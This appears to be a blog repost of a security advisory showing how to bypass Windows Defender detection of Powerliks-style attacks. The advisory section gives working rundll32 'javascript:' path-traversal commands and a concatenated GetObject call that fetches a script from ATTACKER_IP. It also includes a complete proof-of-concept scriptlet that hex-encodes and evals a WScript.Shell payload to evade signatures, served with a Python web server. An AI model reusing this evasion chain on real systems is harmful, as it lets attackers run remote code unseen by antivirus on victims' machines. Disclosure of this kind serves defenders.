A Windows Defender Vulnerability That Bypass the Trojan/Malware - Tutorial Boy -->

A Windows Defender Vulnerability That Bypass the Trojan/Malware



Summary

Microsoft Windows Defender suffers from a detection bypass vulnerability due to sub-par mitigation priorly adopted. Microsoft Defender lets users add locations (local or on the network) on their systems that should be excluded from malware scans.

People commonly make exclusions to prevent the antivirus from affecting the functionality of legitimate applications that are erroneously detected as malware.

Since the list of scanning exceptions differs from one user to another, it is useful information for an attacker on the system, since this gives them the locations where they can store malicious files without fear of being detected.

Security researchers discovered that the list of locations excluded from Microsoft Defender scanning is unprotected and any local user can access it.

Regardless of their permissions, local users can query the registry and learn the paths that Microsoft Defender is not allowed to check for malware or dangerous files.

Vendor:-  www.microsoft.com 

Product:-  Windows Defender 
  • Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your device and in the cloud. 
 Vulnerability Type:-  Windows Defender Detection Bypass TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A 

Network Access:-  Local 

Severity:-  High 

Disclosure Timeline:- January 10, 2022

Security Issue:- Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml.

C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1) 

Access is denied.

Pass an extra "..\" to the path.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)
Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp"). However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
 Access is denied. Full bypass E.g. 

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")
Enter, Backdoor:JS/Relvelshe.A detection. 

Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A" and is removed by Windows Defender once it hits InetCache.

C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]
However, this is easily bypassed by Hex encoding our payload code  new ActiveXObject("WScript.Shell").Run("calc.exe")

Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly passing the value to Jscripts builtin eval function.

References

Trojan:Win32/Powessere.G 
Backdoor:JS/Relvelshe.A 
Advisory

Exploit/PoC

  • Remote code Jscript component "hi.tmp", host on server port 80, it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection.
python -m http.server 80 

"hi.tmp" 

<?xml version="1.0"?> 
<component> 
<script> 
<![CDATA[ var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } eval(str) ]]> 
</script> 
</component> 
C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp") 
BOOM!, We Just Bypass the Trojan Against on Microsoft Windows Defender...

Disclaimer 

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security-related information or exploits by the author or elsewhere.